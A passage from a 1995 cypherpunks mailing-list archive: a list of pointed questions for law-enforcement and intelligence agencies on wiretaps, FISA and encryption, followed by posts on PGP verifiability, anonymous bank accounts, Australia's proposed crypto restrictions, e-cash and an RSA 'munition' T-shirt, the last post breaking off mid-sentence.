Provide the details of all wiretap orders in which encryption was
encountered.  In which of them was encryption a problem for law
enforcement?  In what percentage of wiretap orders is encryption
encountered at all?

Detail all court cases in which encryption has made it harder to get a 
conviction (or in which the accused was not convicted).  What percentage
of total court cases do these represent?

Detail all investigations in which encryption has made it harder to file
charges (or in which charges were never filed).  What percentage of total
investigations do these represent?

Detail all illegal wiretaps known to your agency.  [This question
should be asked of the telephone companies, too -- right at the
company-president level.  Recall the way in which telegrams were
handed over to the NSA for *years* on the orders of the heads of the
telegraph companies...]

Summarize all wiretaps under the Foreign Intelligence Surveillance Act.
How many, in what years, against what targets?  How many are fixed
permanent wiretaps (e.g. on the lines into an embassy), and how many
are temporary (e.g. against a suspected undercover foreign agent's 
residence or office)?  How many US citizens have been wiretapped
under FISA, for what length of time, and for what reasons?

I heard a rumor that the FISA court actually turned down a wiretap
request.  Provide full details.

Detail all wiretaps known to your agency which were authorized by
means OTHER THAN the FISA and which do not appear in the annually
reported wiretap statistics.  I.e.  who else has authorized the
placement of wiretaps, and for what purpose?

Are the alleged crimes for which encryption poses a law-enforcement
challenge victimless crimes, in which all parties to the alleged crime
were happy with the situation before the Law stepped in?  To what
extent does encryption pose a problem in settling real controversies
as opposed to government-mandated moral codes?

Has the FBI ever done a wiretap that encountered a Clipper chip?
Give details of what happened, if so.

Provide the details of all wiretap orders in which encryption was used 
but law enforcement was able to do its work anyway.

Detail all investigations in which encryption was used but charges were
filed anyway.

Detail all court cases in which encryption was used but the accused
_was_ convicted, or in which conviction failed for reasons other than
encryption.

During the Digital Telephony bill debate, the Administration stated or
alluded that one reason the FBI needs total control of wiretapping is
the unreliability of telephone company personnel.  (I.e. -- "if we tap
Jimmy Big-Tuna Vinchenzo at the CO, his spies will tip him off..").
Provide specifics on exactly how many legal taps have been "blown" by
actions of telephone company employees.  Cite specifics on these
cases.  Name telephone company folks charged with obstruction of
justice in these cases.  {Talk is cheap; but to charge someone, they
need SOME hard facts...}

How many subpoenas for telephone billing records are made by Federal
law enforcement agencies each month?  Under what circumstances do LEAs
order the production of this information?  Give statistics on the
motivations for why these private records are being produced, e.g.
"50% fishing expedition, 22% the subject is in custody for a crime
(break down by which crimes), 5% the subject is suspected of a crime
(break down), 10% the subject is not suspected of a crime but there
may be evidence of someone else's crime in their phone records".

Describe other tools & technologies available to criminal
organizations that pose LE problems of similar magnitude to the
perceived problems with cryptography.  Describe how the FBI plans to
control & restrict those tools & technologies.

Describe tools & technologies available to criminal organizations that
do not pose significant LE problems.

FBI/NSA INTERACTIONS

Detail all interactions between the FBI and the NSA, two organizations
that in the ordinary course of business would have very little to say to
each other.

In what ways have the FBI and NSA attempted to manipulate public
policy to increase their joint power?

Detail in what ways have the FBI and NSA cooperated in doing the
actual work of either agency (FBI: apprehending and prosecuting
criminals; NSA: intercepting foreign communications of diplomatic and
military interest)?

Detail in what ways the FBI and NSA have cooperated, which have not
been directly related to the direct job of each agency (as specified
above)?

It has been documented (by Bamford and others) that through the early 1980s,
the NSA intercepted domestic long-distance telephone traffic by means of
simple dishes, mounted alongside legitimate telephone-company microwave
receivers.  Now that most such long-distance links have been converted to
fiber-optics, is the NSA still able to intercept this traffic?  How?  

How is the NSA affected by the passage of the Digital Telephony bill?  Did
the NSA play any role in the progress of this bill?  Will the expected
modifications to the telephone system have any uses to the NSA?  How?

BUDGET

What's the five-year -- 1995-2000 -- budget for all
crypto/net security ops?

LAW ENFORCEMENT SOURCES AND MONITORING

What are your agency's sources of information?  Which of these are
considered the most important, and for what reasons and purposes?

What is the current type and extent of your agency's monitoring of the
Internet?  What is the type and extent of your agency's monitoring of
other public communications media (i.e. radio, newspapers, etc.), both
here and abroad?  What sorts of intelligence come from these channels?

How will your agency's methods be changed by the advent of the GII?

How might your agency's mission be changed by the advent of the GII?

If strong encryption comes into widespread use within the U.S., which
of your sources would be compromised?  How much?  If strong encryption
is banned or controlled within the U.S., what new information would
become available?  What communications would remain unmonitorable?
Why?  Speculate out to five or ten years.

Science Fiction author Vernor Vinge once wrote, "Sufficiently advanced
communication is indistinguishable from noise."  Is this true?  How and to
what extent can encrypted communications be reliably distinguished from
other types of information or noise, both today and in the future?

What are the special challenges involved in compromising a key-escrowed
encryption system?  Has the NSA or any other intelligence agency, in the
U.S. or abroad, ever gone up against a key-escrowed system, or a system which
presented similar challenges and vulnerabilities?  With what results?  If
you were ordered to crack a clipper-like system, how would you proceed?

GOVERNMENT'S OWN USE OF ENCRYPTION

Are your agency's internal communications encrypted?  Are your agency's
communications with other agencies of the U.S. Government?  Other
governments?  Are these communications susceptible to subpoena?  How?

Are any of the internal communications of the U.S. Government encrypted?
Which, and using what methods?  Does your agency have the ability to monitor
or decipher these communications?  Does anyone?  What information can your
agency access concerning members of the U.S.  Government?  How has this
information been used?  How is it protected?

INTELLIGENCE POLICY

What is the strategic, tactical, economic or competitive value of
intelligence?  How is this value quantified and assessed?  I have been
told that a battlefield commander may profitably expend up to 75% of
his resources on the acquisition of data about an enemy.  How much of
a corporation's resources, for example, would be well spent on the
acquisition of various sorts of intelligence about potential
competitors and/or customers?  How much of a political candidate's
resources would be well spent on acquiring data about opposing
candidates and other organizations?  In the coming "information age",
how much of our society's total economic activity might we expect to
become devoted to snooping in general?

What is your agency's assessment of the surveillance and
crypto-analytic capabilities available to large corporations, both
inside and outside the U.S.?  What level of intelligence-gathering and
analysis capabilities might a large company be reasonably expected to
be able to acquire if competitive pressures were to dictate a strong
effort in that direction?

What are the most powerful possible uses of intelligence, past,
present and future?  What sorts of research has your agency done, or
is it currently doing, concerning possible future uses for
intelligence information?  Does your agency employ any psychologists?
Sociologists?  For what purposes?

THE FINAL QUESTION

What questions *should* we have asked you to recommend a good crypto
policy for the country?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Tue, 1 Aug 95 16:50:29 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] was Re: a hole in PGP
Message-ID: <v02130500ac4427b669b3@[199.1.11.196]>
MIME-Version: 1.0
Content-Type: text/plain


>...
>> Anyway, after reading the crap below I have been forced to comment.
>> For an individual that parades the title of Doctor (and the indication
>> of intelligence that title should imply) you seem to lack the grasp of what
>> has been stated over and over again. If you can't study the source code,
>> find someone that you trust that can! Prove it *doesn't* work before you
>> knock it.
>
>So you claim that software is secure unless it has been shown to be
>insecure, while I claim it is insecure unless it has been shown to be
>secure.  Which position do you think more sensible? (rhetorical
>question, does not require any responses).

I suspect the practical point of view is more sensible, but if that's
what you meant i doubt that you would have called your question
rhetorical.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 1 Aug 95 16:55:17 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: US vs Overseas Banks
In-Reply-To: <199508012016.QAA15599@panix.com>
Message-ID: <Pine.ULT.3.91.950801185038.7953A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It's interesting to note that where I am (Mankato, Minnesota) I was able 
to open a checking account with NO ID whatsoever.  I just wrote down a 
name and address (which is a P.O. box, BTW) and the next week I had a box 
of checks (free) and an ATM card (also free).

Of course, this bank has been criticized for being somewhat lax on who 
they give accounts to, but the point still stands.  I could have been 
anybody, and given any false address.  *shrug*

 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 16:24:08 PDT
To: Matthew.Sheppard@Comp.VUW.AC.NZ (Matthew James Sheppard)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <199508012259.KAA16027@bats.comp.vuw.ac.nz>
Message-ID: <9508012317.AA25184@all.net>
MIME-Version: 1.0
Content-Type: text


...
> Frederick can you please tell me why I should believe thttpd is secure.
> I don't accept the ability to compile it myself as evidence and I
> don't accept a summary of that source written in english prose on the
> basis that it has no hard link whatsoever to the source.  It was
> also written by the authors of thttpd.

The reason to believe that thttpd fulfills the claims it makes is
provided in some detail in the white paper on our server (see what's new
under http://all.net).  A slightly more detailed version has been
submitted for a journal article, and hopefully will appear in a year or
two.

Certainly compiling it yourself would not in any way help you assert its
security, however it would help you assure that the compiled version (which
we don't provide on-line) is not an altered executable.

I would detail the full set of claims here, but this is not the proper
forum for general security issues.  Of course if there is popular
support, I would be glad to... Instead, I will briefly outline it here:

The basic reason that thttpd can be verified to fulfill the claimed
security properties relates to some well thought-of and mathematically
proven theories about information flow.  Specifically:

	we have shown that information coming from the client cannot
	flow to the server except in its effects of sending the requested
	file (if it exists, is properly owned, and is properly protected
	for access by remote users) and logging the request in the log
	file generated by the program.  If no information can flow from
	the client to the server data, the client cannot cause
	corruption of the server (subject to various details not
	included here).

	we have shown that the server is a limited function program (i.e.,
	does not have Turing capability), and that therefore no general
	purpose operations can be performed as a result of any external input.

	we have shown that the variables and structures are confined so
	as to have no unspecified side effects, and that therefore there
	are no effects other than those stated in the description of the
	program.

	we have also shown some other stuff you might be interested in.

The next logical question is why those are worthwhile things to show,
and I won't get into these details here without further prompting.

> You should find this argument hauntingly familiar.

I welcome your questions about "why" as I always do.  I think that
this is a very important question and one worth following up.

> You state that crypto should be proved correct and suggest a technique
> otherwise known as formal specification.  I agree, pgp should have
> been written in Z-specs.  If you take a course in formal specification
> you will soon see the intractability of the technique wrt large
> systems.

I didn't say that.  Perhaps you should review what I said before
characterizing it.

> I'm sorry, the english prose your team writes holds no extra formal
> credibility over trust.  It demonstrates more study - but has not
> proven security.

I have shown (not yet proven) certain things.  A graduate student is now
working on trying to prove the various properties I believe to be of
interest in an automatic theorem prover he is working on.  I believe
that these things are worth showing (and proving), but you may certainly
feel free to disagree with these contentions.

> If you want people on this list to repeat after you "I cannot be
> certain there are no compromising bugs or backdoors in X" Then I will
> go out on a limb and say everyone here will agree if system X is
> sufficiently large.

I don't believe I ever asked anyone on this list to repeat anything. 
All I did was ask questions and respond to responses to my questions.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 1 Aug 95 17:02:54 PDT
To: cypherpunks@toad.com
Subject: QIK_san
Message-ID: <199508020002.UAA16604@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-1-95. W$Japer:


   "Your Home Computer Will Soon Be Your Banker and Broker."

      The first on-line banking transaction will be a historic
      moment not unlike the first automobile sale or the first
      commercial airline flight. It will signal a commercially
      viable use of a new technology that may ultimately
      eliminate what until now we have considered the retail
      aspects of banking, stock brokerage and more. The
      implications are profound.

      The promise is electronic access to all financial
      transactions at substantially lower cost. One's personal
      computer can, in essence, become an in-home bank branch,
      brokerage outlet and financial planner.

      For example, with Intuit's software and with its union
      with American Express, Smith Barney and 17 large banks,
      consumers will be able use one link for the first time
      to access traditional banking, credit- and charge-card
      services, brokerage services, financial planning and
      more.

      The effect on the banking and brokerage business and
      their employees is going to be profound. The retail
      sales forces of banks and brokerage houses may shrink
      substantially, as may the ranks of financial planners.
      The number of bank and brokerage buildings may also
      shrink.


   QIK_san











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 1 Aug 95 17:31:39 PDT
To: cypherpunks@toad.com
Subject: Pat Robertson Fears E-cash?
Message-ID: <199508020031.UAA21712@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A Foxhole-atheist swears Pat Robertson said last night that his
   new book warns of a "digital cash society" and massive
   theft by cyber-criminals. Did any believer hear this, or know if
   this is what he prognosticates for e-cash bedevilment?










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 1 Aug 95 20:36:37 PDT
To: cypherpunks@toad.com
Subject: anonymity review in law journal
Message-ID: <199508020334.UAA09787@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi everyone, someone tipped me off to a law review article by 
Anne Branscomb entitled Anonymity, Autonomy, and Accountability: 
Challenges to the First Amendment in Cyberspaces  104 Yale L F 1639.
I have not seen this myself or noticed it mentioned here
but it might be an interesting read for anyone
who has access to it, and useful as a footnote in someone's 
paper, web filling, pointer for reporters, fish wrapping, or
bird cage lining. (as Alfred E. Neuman might note)




~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 1 Aug 95 11:47:15 PDT
To: cypherpunks@toad.com
Subject: Re: punk's not dead!
Message-ID: <v01510100ac42f21a3124@[193.74.217.18]>
MIME-Version: 1.0
Content-Type: text/plain


>hello? i'am new on this stuff, help me!

Sorry, this is a mailing list for Country & Western music.

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 1 Aug 95 20:51:16 PDT
To: cypherpunks@toad.com
Subject: "The Future does not Compute"
Message-ID: <199508020349.UAA11272@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I am reading "the Future does not Compute" by Stephen L. Talbott.
I wonder if anyone else has gotten into this. It's a fairly interesting
read that is some of the typical trendy reactionism against the 
utopianism of various visionaries promoting cyberspace and
the bit revolution. Talbott however seems to be awfully vague in his criticisms.
They seem to amount to, "I'm not sure what the net is missing,
but it lacks something crucial that is the essence of our humanity".
It reminds me of the various criticisms against AI by Penrose
and Searle, "the technology fundamentally lacks, and will continue
to lack, that inexpressible something that makes us human which
is impossible to define or characterize."

One quote drew my attention. He quoted an anonymous participant
on an "irvc-l" discussion list:

 While I'm not forecasting Utopia, I think networks of the future
 will be the most incredibly egalitarian technology ever invented.
 It will transform our entire societies. Imagine that homeless people
 or single parent children can "interconnect" with anybody who
 is willing to talk to them in the *world*. The possibilities are rather
 dazzling. Sure, there might be even cyberspatial outcasts, but the point
 is that we will be doing *at least* as well as we are now, which is not
 something to "write home" about.

The writing seems vaguely familiar, yet I can't quite pin it down. I
think I might have been on that list in the time period, and I am trying 
to figure out the authorship. (And am a bit annoyed at Talbott for not giving 
proper credit.) Surely one of the visionaries like Gilmore, Barlow, 
Rotenberg, or somesuch. It's an interesting theme; I think it may have been
the same author who said, quoted by Talbott, "the net is fundamentally
democratizing and leveling." If anyone recognizes that quote, maybe
drop me a line. Talbott uses this theme of whether "the Net is
inherently democratizing and leveling" as a counterpoint thought
to the chapter, even at times the whole book.

I am inclined to agree with Talbott in general, by the way, and I think 
the quotes are overstated. In my opinion networks are like all other
technologies: they bring out the best and worst in human beings,
beyond what was known previously. In this way technology is like
a magnifying glass on our virtues and vices. We may find the
things that work about our society magnified, but at the same
time our failings become expanded and exacerbated as well.

That is what I like about great technology. It is not necessarily 
an end in itself, but a way of learning about the essence of our human
psychology. It forces us to confront what we find uplifting
and what we find despicable, and removes the possibility of
denial.

It seems to me that networks are inherently democratic in
a society that craves democracy, but I don't really believe
that there is fundamentally something egalitarian or democratic
about certain kinds of technology. Actually, I think that
is true in general if *everyone* is given access to the technology,
but the problem is that some governments can use the technology
for themselves as a powerful instrument of control by the elites
over the downtrodden.

To me Talbott has a very good point, that we should be thoughtful
in the creation of new technology, and examine our axioms as
to whether we can even achieve what we are attempting to 
derive from it in the long run.

The Thoreauian quote, "men have become the tools
of their tools" comes to mind repeatedly when I read Talbott.


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Tue, 1 Aug 95 20:36:40 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: US vs Overseas Banks
In-Reply-To: <Pine.ULT.3.91.950801185038.7953A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.3.89.9508012150.E12592-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Robert A. Hayden wrote:

> It's interesting to note that where I am (Mankato, Minnesota) I was able 
> to open a checking account with NO ID whatsoever.  I just wrote down a 
> name and address (which is a P.O. box, BTW) and the next week I had a box 
> of checks (free) and an ATM card (also free).
> 
> Of course, this bank has been criticized for being somewhat lax on who 
> they give accounts to, but the point still stands.  I could have been 
> anybody, and given any false address.  *shrug*

Why should they give a damn who you are?  IMO, it's none of their 
business.  Hell, they're making $$$ on *your* deposits, it's time they 
stopped being such shits about it.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 1 Aug 95 12:42:01 PDT
To: cypherpunks@toad.com
Subject: Australia next to ban PGP
Message-ID: <199508011940.VAA05285@ping1.ping.be>
MIME-Version: 1.0
Content-Type: text/plain


> Path: ping.be!Belgium.EU.net!EU.net!howland.reston.ans.net!tank.news.pipex.net!pipex!sunsite.doc.ic.ac.uk!lyra.csx.cam.ac.uk!rja14
> From: rja14@cl.cam.ac.uk (Ross Anderson)
> Newsgroups: alt.security.pgp,alt,politics.datahighway,aus.legal,aus.net.news,sci.crypt
> Subject: Australia next to ban PGP
> Date: 1 Aug 1995 17:53:50 GMT
> Organization: U of Cambridge Computer Lab, UK
> Lines: 57
> Message-ID: <3vlpne$cks@lyra.csx.cam.ac.uk>
> NNTP-Posting-Host: nene.cl.cam.ac.uk
> Xref: ping.be alt.security.pgp:9699 sci.crypt:4852
> 
> Australia's proposed crypto policy:
> 
> (1)     Banks will get key escrow
> 
> (2)     Other Australian residents will be forced to use weak crypto
> 
> Source: talk by Steve Orlowski, Assistant Director, Australian attorney 
> general's department, given at the Cryptography Policy and Algorithms 
> Conference, Queensland University of Technology, last month.
> 
> p 34: `the needs of the majority of users of the infrastructure for
>       privacy and smaller financial transactions can be met by lower 
>       level encryption which could withstand a normal but not 
>       sophisticated attack against it. Law enforcement agencies could 
>       develop the capability to mount such sophisticated attacks. 
>       Criminals who purchased the higher level encryption products 
>       would immediately attract attention to themselves.'
> 
> He mentioned that his department considered itself a suitable repository
> for the government central decrypting unit, which would decrypt traffic 
> for local police forces. He also wants escrowed keys for banks and 
> other organisations allowed to use strong crypto. 
> 
> Centralising the wiretap capability with the AG is represented as a useful
> safeguard against abuse of power by local police forces. It would be
> presented as a `data recovery' facility in order to reassure the voters.
> 
> Centralisation will enable the AG to acquire the capability to use ``more 
> sophisticated techniques in circumstances where the key cannot, for 
> whatever reason, be recovered from escrow''.
> 
> So the technical parameters would appear to be: 40 bit keys for the 
> masses, 56-bit escrowed keys for the banks, and a Wiener machine sitting
> in Orlowski's office. Belt, braces and string.
> 
> Curiously enough, he quotes a `Review of long Term Cost Effectiveness
> of Telecommunications Interception' as saying that ``Encryption by 
> targets of their communications (both voice and data) is not considered
> as a problem for TI at present in Australia'' and goes on to say that
> ``there has been comparatively little market for voice encryption 
> products, although they have been readily available''. 
> 
> He even produces some good arguments for the EFF, such as that much of
> the intelligence comes from the call log data and from calls to third 
> parties such as airlines and hotels which are not encrypted.
> 
> He also says that the OECD countries will hold a meeting on National 
> Cryptography Policies later this year. While at the conference, I found
> out that a classified meeting took place this March in Germany between 
> the signals intelligence agencies of the developed countries, plus
> Australia and South Africa, at which the assembled spooks agreed to
> press their governments to bring in escrow and/or weak crypto.
> 
> Australia seems rather eager to lick Uncle Sam's boots on this issue. 
> I wonder what the payoff was?
> 
> Ross

-- 
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your 
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 1 Aug 95 19:01:10 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: a hole in PGP
In-Reply-To: <9508011212.AA17103@all.net>
Message-ID: <9508020201.AA15198@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> It's probably my fault for not asking them in the way you are used to
> hearing them, or maybe we are all over-sensitive about our work.

Since I've had no involvement in the writing of PGP and RFC 1750, I don't 
think I'm being sensitive about my work :]

[...]
> And if enough of those on this list feel that this discussion and my postings
> are too commercial or too abusive to take, I am certain that Brent will send
> you a free copy of his Fred filter.

Nah, we're not into third-party censorship here. As for myself, I intend to
keep reading what you write here. Your manner is not a legitimate reason to 
ignore the value of (some of) your words. 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 1 Aug 95 19:08:57 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <199508020031.UAA21712@pipe2.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950801220141.3608B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, John Young wrote:

>    A Foxhole-atheist swears Pat Robertson said last night that his
>    new book warns of a "digital cash society" and massive
>    theft by cyber-criminals. Did any believer hear this, or know if
>    this is what he prognosticates for e-cash bedevilment?

I saw him on the 700 club about a year ago WRT this topic.  As far as I 
can recall, the above accurately sums up his position.

(The reason he really cares has to do with that "Number of the Beast" 
stuff in Revelations)

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 1 Aug 95 19:10:04 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <v02130509ac4480f56434@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:57 7/30/95, Ed Carp [khijol SysAdmin] wrote:
>When I lived in California, I banked at Security Pacific, then changed
>over my account to BofA.  When I left the bay area, I closed my account,
>not knowing that someone had sat on a check for $120 - I thought it was me
>just entering an ATM receipt twice (as I do from time to time).  So,
>someone from a place called ChexSystems sends me a letter, saying "well,
>you had a check go through and the bank paid it, please pay us."  So, I
>send them the $120 or whatever it was.

How old was the check when it was presented (and how long was it from the
check's date until you had closed the account). If the check was stale then
you have a valid gripe about the bank's behavior. I've dealt in situations
where people are collecting checks which are going to be "stale" before
they are submitted for processing yet there is no request to post-date the
check nor setting up of an escrow account to hold/clear the money until it
can be turned over to the correct owner (they collect voting fees for a
convention where the winner gets the money but the holder of the election
is the one who is being sent the check to sit-on [for up to 6 months] until
the winner can be handed the stack of checks - There is a claim that the
holder of the election can not open a segregation/escrow account due to
bank rules or procedures).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 1 Aug 95 19:13:40 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <199508012149.AA26006@tyrell.net>
Message-ID: <9508020213.AA15346@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phil writes:
> Or perhaps just rewrite the program to use plain arrays instead of
> pointers. ;-)

How about Java-PGP ?  ;)

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 1 Aug 95 21:13:39 PDT
To: cypherpunks@toad.com
Subject: Re: NRC Panel, Law Enforcement questions
In-Reply-To: <199508020325.XAA158645@tequesta.gate.net>
Message-ID: <wdvHwkkAsWXI084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 01 Aug 1995, liberty@gate.net (Jim Ray) wrote:

> I wonder, and perhaps my kind friend Hadmut can help me here, if there is
> an English translation of any and all Nazi-era German laws/regs regarding 
> cryptography.

I'm not Hadmut, don't play him on TV, and am not known for being kind,
but I recently learned that, "In 1940, Nazi Germany ordered all books
on cryptology withdrawn from circulation." -- from historian David
Kahn's statement before the House Government Information and Individual
Rights Subcommittee, March 20, 1980.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Tue, 1 Aug 95 20:17:52 PDT
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: commerical busters
In-Reply-To: <01HTK2WJPWYQ001IQN@VAX2.ROCKHURST.EDU>
Message-ID: <Pine.SUN.3.91.950801221937.3989K-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995 WOOD@VAX2.ROCKHURST.EDU wrote:

>  
>  ON: 31-JUL-1995 20:14:46.10, dan@netmarket.com wrote:
>  
> > At 8:50 PM 07/31/95, Patrick May wrote:
> > 
> > >     My dim memories from a project I did for Sony a couple of years
> > >ago are that commercials are separated by a fixed number of black
> > >frames and some, at least, have tracking information encoded so that
> > >advertisers can monitor how often they are played.  I'll try to dig up
> > >more info.
> > 
> > From: dfitzpat@interserv.com
> >       Wednesday July 26, 1995 -- ShopTalk
> > 
> > - --
> > 
> > NEW VCRs TAKE ON COMMERCIALS POINT-BLANK
> > 
> >                         By Jonathan Takiff
> >                Philadelphia Daily News Staff Writer
> > 
> > 
> > Already besieged by Washington politicians over the content of TV
> > programming (and threats of a show-blocking chip), television
> > broadcasters are about to be hit with another whammy.  This time it's
> > VCRs that automatically blank out commercials.
> > 
> > <snip>
> > 
> > $$$$ $$$$$ $$$$
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > 
> > iQCVAwUBMB193KZKaCr9f/gtAQFa5AP/ZEmtSM/hSXb6zcFHDmv9Me0thtAqqCxZ
> > 7COYgWxuLkl78+y/INpFKW861mrNig1UlO8Q+vDImKK3qUmTS1tzRWNIH9XVyYtA
> > pJ05g/Z/WKUPx17jd2no9oRqut4bziLa4iMj59B/4nxAhIjEtE5TZFP6okCQ1HGm
> > qbFhOteJavc=
> > =Opny
> > -----END PGP SIGNATURE-----
> > 
>                                                             dan


I believe that they did something like this in Japan several years ago ...
I believe they sensed changes in the power output of the audio and also
looked for changes in the color outputs. The last I read on it said they had
limited success with their methods.

-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Tue, 1 Aug 95 21:17:16 PDT
To: cypherpunks@toad.com
Subject: Munition (RSA) Tshirt Testimonial
Message-ID: <199508020412.AA17824@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I got my RSA tshirt this week. It looks good! 
Features:

  - Way cool black with white lettering

  - Famous RSA code in 5 lines of perl code on front.

  - Same text represented in CODE 128 barcode
    (several bar code lines look kind of smudgy,
    I doubt that the bar code could actually be
    read by a scanner, but it looks cool!).

  - Text on back: "Warning this Tshirt is a munition, 
    ITAR section..."
     
I have worn the shirt out 2 times this week. Unfortunately
no one seemed to be impressed by it :-( 

Maybe I will go browsing for a Pentium system at CompUSA with
it on this week end and see if it draws any comment/notice.

I got my shirt from:

